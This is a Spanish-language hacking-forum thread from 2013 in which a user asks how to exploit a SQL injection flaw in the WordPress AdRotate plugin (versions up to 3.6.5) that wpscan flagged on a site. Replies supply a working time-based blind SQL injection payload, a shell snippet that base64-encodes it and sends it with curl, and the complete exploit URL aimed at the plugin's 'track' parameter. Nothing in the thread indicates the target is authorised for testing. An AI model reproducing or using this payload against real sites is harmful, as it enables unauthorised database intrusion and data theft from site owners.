comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Duda] Wordpress vulnerable sql

  • 6 Respuestas
  • 1977 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado TheBlack

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« en: Agosto 20, 2013, 01:26:09 pm »
Buenas , hola a todos ! (Perdona si el post no va en el sitio adecuado )

Pues tenia una duda con una inyección sql en wordpress. Analizando con wpscan veo que hay un plugin vulnerable . En el wpscan me sale esto :

*Title:Adrotate plugin <= 3.6.5 SQL Injection Vulnerability
*Reference: http:www.exploit-db.com/exploits/18114/

En la pagina de exploit-db me sale el codigo vulnerable pero realmente no se que hacer con eso , si alguien me puede echar una mano o pasarme algun tutorial para leer e informarme se lo agradeceria
« Última modificación: Agosto 27, 2014, 08:59:42 pm por Expermicid »

Conectado hielasangre

  • *
  • Underc0der
  • Mensajes: 121
  • Actividad:
    5%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Agosto 20, 2013, 02:35:58 pm »
You are not allowed to view links. Register or Login
Buenas , hola a todos ! (Perdona si el post no va en el sitio adecuado )

Pues tenia una duda con una inyección sql en wordpress. Analizando con wpscan veo que hay un plugin vulnerable . En el wpscan me sale esto :

*Title:Adrotate plugin <= 3.6.5 SQL Injection Vulnerability
*Reference: http:www.exploit-db.com/exploits/18114/

En la pagina de exploit-db me sale el codigo vulnerable pero realmente no se que hacer con eso , si alguien me puede echar una mano o pasarme algun tutorial para leer e informarme se lo agradeceria


payload="1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#"
encoded=`echo -n "1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#" | base64 -w 0`
curl You are not allowed to view links. Register or Login$encoded

es facil la vulnerabilidad esta en la variable track. ahi inyecta el payload encodeado en base64


Desconectado TheBlack

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #2 en: Agosto 20, 2013, 03:01:54 pm »
Me puedes hacer un pequeño tutorial si no es mucha molestia , es que ahora no entiendo nada

Desconectado arthusu

  • *
  • Underc0der
  • Mensajes: 535
  • Actividad:
    8.33%
  • Reputación 2
  • Yo solo se que no se nada - Socrátes
    • Ver Perfil
    • Arthusu BLOG
  • Skype: arthusuxD
« Respuesta #3 en: Agosto 20, 2013, 04:00:14 pm »
You are not allowed to view links. Register or Login
Me puedes hacer un pequeño tutorial si no es mucha molestia , es que ahora no entiendo nada
O tambien podrias ponerte a estudiar sqli para que entiendas ese payload ;)

Conectado hielasangre

  • *
  • Underc0der
  • Mensajes: 121
  • Actividad:
    5%
  • Reputación 0
    • Ver Perfil
« Respuesta #4 en: Agosto 20, 2013, 04:15:17 pm »
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
Me puedes hacer un pequeño tutorial si no es mucha molestia , es que ahora no entiendo nada
O tambien podrias ponerte a estudiar sqli para que entiendas ese payload ;)

jajaja tenia planeado decir lo mismo pero no quería ser duro xD

Desconectado TheBlack

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #5 en: Agosto 20, 2013, 04:34:14 pm »
Perdon no se me ha ententido muy bien , eh parecido un poco lammer xD, decia algun tutorial o por donde comenzar para aprender .

Desconectado TUNOVATO

  • *
  • Underc0der
  • Mensajes: 21
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #6 en: Agosto 27, 2013, 03:18:23 am »
saludos compa;

haz lo siguiente:

Código: You are not allowed to view links. Register or Login
http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj

You are not allowed to view links. Register or Login.AQUITUWEB.com/wp-content/plugins/adrotate/adrotate-out.php?track= <-- AQUI ESTO:
Código: You are not allowed to view links. Register or Login
MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj
ESTO:
Código: You are not allowed to view links. Register or Login
MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj
ES ESTO:
Código: You are not allowed to view links. Register or Login
1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#

lo cual esta encodeado en based64


si no entendistes como funciona.....  vas a tener que leeerrr y mucho..... o mejor te dedicas a otras cosas...  :o


saludos;
« Última modificación: Agosto 27, 2013, 03:21:00 am por TUNOVATO »

 

¿Te gustó el post? COMPARTILO!



[SOLUCIONADO] Duda con " "

Iniciado por Krisium

Respuestas: 1
Vistas: 1638
Último mensaje Junio 10, 2010, 10:50:35 am
por Xa0s
[SOLUCIONADO] [Taller PHP] Duda taller php 1 ejercicio 2

Iniciado por arthusu

Respuestas: 3
Vistas: 1811
Último mensaje Julio 18, 2011, 02:20:03 am
por arthusu
[SOLUCIONADO][Taller PHP] Duda taller php 2 ejercicio 2

Iniciado por Only

Respuestas: 3
Vistas: 1863
Último mensaje Agosto 05, 2011, 09:48:09 pm
por Only
[SOLUCIONADO] Duda con Windows 7 de 32 bits & 64 bits

Iniciado por andrestoushit

Respuestas: 2
Vistas: 817
Último mensaje Marzo 15, 2016, 04:01:16 pm
por Lah-Vahn
[SOLUCIONADO] [Taller PHP] Duda taller php 1 ejercicio 4

Iniciado por arthusu

Respuestas: 2
Vistas: 1502
Último mensaje Julio 18, 2011, 07:19:33 pm
por arthusu